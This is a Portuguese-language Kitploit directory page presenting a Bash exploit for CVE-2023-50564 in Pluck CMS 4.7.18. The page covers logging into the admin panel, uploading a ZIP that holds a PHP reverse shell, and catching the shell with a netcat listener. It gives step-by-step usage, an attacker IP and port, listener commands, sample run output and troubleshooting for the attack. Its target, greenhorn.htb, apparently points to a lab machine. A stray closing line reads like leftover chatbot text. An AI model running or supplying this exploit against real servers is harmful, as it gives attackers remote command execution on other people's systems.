Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564 — Exploit em Bash que automatiza a execução remota de código autenticada no Pluck CMS 4.7.18 por meio de upload de ZIP malicioso, acionando um reverse shell em PHP para o CVE-2023-50564. | Kitploit
Ferramentas/GitHubGitHub/0xdtc/pluck-cms-v4.7.18-remote-code-execution-cve-2023-50564
Geração de PayloadsExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingFerramenta de Acesso Remoto
GitHub0xdtc/pluck-cms-v4.7.18-remote-code-execution-cve-2023-50564

Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Exploit em Bash que automatiza a execução remota de código autenticada no Pluck CMS 4.7.18 por meio de upload de ZIP malicioso, acionando um reverse shell em PHP para o CVE-2023-50564.

Ver Repositório
14há 1 anoAinda não revisado
Compartilhar

CVE-2023-50564 - Exploração de Execução Remota de Código (RCE) no Pluck CMS v4.7.18

Descrição

Este script explora uma vulnerabilidade de Execução Remota de Código (RCE) no Pluck CMS v4.7.18. A vulnerabilidade permite que um usuário malicioso carregue um arquivo PHP malicioso no servidor e o execute, obtendo execução remota de comandos na máquina alvo.

O script automatiza todo o processo:

  1. Autenticando no painel de administração do Pluck CMS usando as credenciais fornecidas.
  2. Carregando um arquivo ZIP que contém um script PHP de reverse shell malicioso.
  3. Executando o PHP reverse shell, dando ao atacante acesso remoto à máquina alvo.

Nota: O script requer um listener Netcat na máquina do atacante para receber o reverse shell.


Pré-requisitos

Antes de executar o script, certifique-se de que:

  • Netcat está instalado e um listener está configurado para receber o reverse shell.
  • Você tem o host alvo, senha, endereço IP e porta corretos para o reverse shell.
  • Você tem acesso ao painel de administração do Pluck CMS no alvo.

Uso

./CVE-2023-50564 -h <host> -P <senha> -i <IP> -p <porta>

Argumentos:

  • -h <host>: O host alvo (ex: greenhorn.htb).
  • -P <senha>: A senha do painel de administração do Pluck CMS (ex: abcd123).
  • -i <IP>: O endereço IP do atacante para receber o reverse shell.
  • -p <porta>: A porta na qual o listener Netcat está rodando para capturar o reverse shell.

Exemplo:

./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001

Passos:

  1. Configurar o listener Netcat: Na máquina do atacante, inicie um listener Netcat na porta especificada:

    nc -nvlp <porta>
    

    Por exemplo:

    nc -nvlp 9001
    
  2. Executar o script: Forneça os parâmetros necessários ao script, incluindo host, senha, endereço IP e porta.

    ./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
    
  3. Execução do Script:

    • O script faz login no painel de administração do Pluck CMS.
    • Ele carrega um arquivo ZIP contendo um script PHP de reverse shell (love.php).
    • Após o upload do arquivo ZIP, o reverse shell é executado no alvo, e uma conexão é estabelecida com seu listener Netcat.
    • Uma mensagem limpa será exibida: "RCE is waiting for you, please go take a look.", e o script será encerrado após rastrear o tempo gasto.
  4. Acessar o Alvo: Assim que o reverse shell for acionado, a conexão aparecerá no seu listener Netcat, fornecendo acesso remoto à máquina alvo.


POC

image

Exemplo de Saída

./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
Netcat listener detected on port 9001.
Downloading reverse shell PHP exploit...
updating: love.php (deflated 60%)
Exploit zipped as loverce.zip and original PHP file removed.
Extracted Cookie: PHPSESSID=somecookievalue
Login successful!
ZIP file uploaded successfully.
RCE is waiting for you, please go take a look.
Script terminated. Total time taken: 70 seconds.

Requisitos

  • cURL: Para interagir com o Pluck CMS e fazer upload de arquivos.
  • Netcat: Para ouvir o reverse shell.

Você pode instalar curl e netcat usando os seguintes comandos, se não estiverem instalados:

Debian/Ubuntu:

sudo apt update
sudo apt install curl netcat

Red Hat/CentOS/Fedora:

sudo yum install curl nc

Aviso

Este script é destinado apenas para fins educacionais e de teste de penetração autorizado. O uso não autorizado deste script é ilegal e antiético. Sempre obtenha a devida autorização antes de explorar qualquer vulnerabilidade em um sistema.


Solução de Problemas

  1. 504 Gateway Time-out: O script pode encontrar esse erro ao tentar executar o reverse shell, mas isso não afeta o sucesso da execução do shell. O erro geralmente ocorre porque o servidor alvo demora muito para responder à solicitação HTTP, mas o shell ainda deve funcionar.

  2. Problemas com o Listener Netcat: Se você não receber o reverse shell, verifique se o endereço IP e a porta estão configurados corretamente e se não há restrições de firewall impedindo o alvo de se conectar de volta à sua máquina.

  3. Falha no Login do Script: Se o login no painel de administração do CMS falhar, verifique a senha fornecida e certifique-se de que o CMS está acessível na máquina alvo.


Deixe-me saber se precisar de mais personalizações ou esclarecimentos no README!

Baixar ferramenta